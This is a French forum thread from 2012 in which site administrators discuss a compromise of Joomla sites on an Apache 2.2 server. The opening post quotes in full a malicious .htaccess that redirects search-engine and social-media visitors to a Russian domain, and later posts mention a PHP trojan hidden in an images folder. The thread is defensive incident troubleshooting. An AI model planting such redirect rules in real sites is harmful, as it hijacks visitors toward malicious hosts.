Attaque Apache 2.2 modification .htaccess - Sécurité - Systèmes & Réseaux Pro
Marsh Posté le 31-07-2012 à 11:47:58
Commence par mettre ton Joomla à jour...
Marsh Posté le 31-07-2012 à 12:10:34
C'est ce que j'ai fait ce matin, j'ai mis à jour Joomla en version 1.5.26
Mais ça c'est reproduit vers 11h18
Dans mon access.log j'ai :
|
Rien dans error.log
Dans modsec_audit.log j'ai :
|
Le fichier : /images/stories/.cache_q833wc.php contient le classe : JToolBarHelper ca fout quoi là ce truc
Je continu mes investigations...
Marsh Posté le 31-07-2012 à 12:16:38
... je vient de trouver un fichier nommé story.php dans le répertoire : joomla/images/stories qui contient un cheval de troie :
GIF89a1 |
NOD32 le nome PHP/Agent.NAG
Marsh Posté le 31-07-2012 à 17:20:57
Hello, j'ai subi la même attaque hier 30/07/2012 à 16h44. Sur chacun de mes sites un htaccess avec la même règle de redirections que toi. J'ai supprimé les htaccess et mis à jour mes joomla et un wordpress. Je n'ai pas de fichier story.php nulle part. Impossible de savoir ce qu'il s'est passé...
Marsh Posté le 07-08-2012 à 14:40:21
A ce niveau c'est plus des attaques c'est du piratage ! :-)
Votre poste est-il protégé? avast? filezilla pour le ftp ?
Marsh Posté le 07-08-2012 à 15:09:50
networkinfo a écrit : A ce niveau c'est plus des attaques c'est du piratage ! :-) |
Il faut qu'on m'explique la différence...
networkinfo a écrit : |
Pour moi, rien à voir avec le poste. Et c'est prouvé : la même attaque, sur deux joomla différents...
Le problème doit se situer dans un des composants de l'appli (joomla) ou du serveur (PHP, Apache, ...)
Pouvez-vous détailler vos versions pour y trouver des similarités ?
Marsh Posté le 07-08-2012 à 16:30:57
La seule attaque que j'ai vu du style, c'était le poste d'un des développeurs qui était contaminé par un virus qui récupérait les mdp du client FTP.
Il pouvait alors s'en servir pour modifier les fichiers, accessibles via FTP, sur le serveur WEB.
Marsh Posté le 30-07-2012 à 16:35:52
Bonjour,
Je viens de subir une attaque sur mon serveur Apache 2.2
Server version: Apache/2.2.22 (Ubuntu)
Server built: Feb 13 2012 01:51:50
Serveur Linux Ubuntu 12.04 LTS x64 à jour.
L'attaquant à modifié / ajouté un fichier .htaccess sur 2 sites en mettant ce code :
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://2013supa.ru/joomlastar?4 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://2013supa.ru/joomlastar?4 [R=301,L]
</IfModule>
Je pense que l'attaque est passée par un site Joomla en version 1.5.17
Google ne me trouve pas d'infos sur cette attaque donc si vous avez quelques infos sur ce type d'attaque je suis preneur
Jérôme